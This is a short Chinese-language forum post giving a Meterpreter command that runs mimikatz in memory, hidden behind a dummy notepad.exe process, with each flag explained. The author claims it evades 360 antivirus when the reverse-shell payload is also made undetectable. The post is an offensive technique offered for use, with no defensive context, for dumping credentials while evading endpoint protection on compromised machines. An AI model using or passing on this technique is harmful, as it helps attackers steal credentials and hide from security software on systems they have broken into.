搜索
查看: 2161|回复: 0

msf execute from memory bypass waf

[复制链接]

95

主题

138

帖子

268

积分

中级会员

Rank: 3Rank: 3

积分
268
发表于 2019-8-17 09:24:25 来自手机 | 显示全部楼层 |阅读模式
Meterpreter 方式.

execute -H -m -d notepad.exe -f mimikatz.exe -i
-H 隐藏窗口.
BashCopy
-m 在内存中执行.

-d 指定覆盖进程 (dummy).

-f 指定执行程序 (本地文件).

-i 与该程序交互 (可选).

-a 传递参数 (可选).

在实际测试中能够绕过 360 的检测, 当然前提是你反弹会话的 payload 是免杀的.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表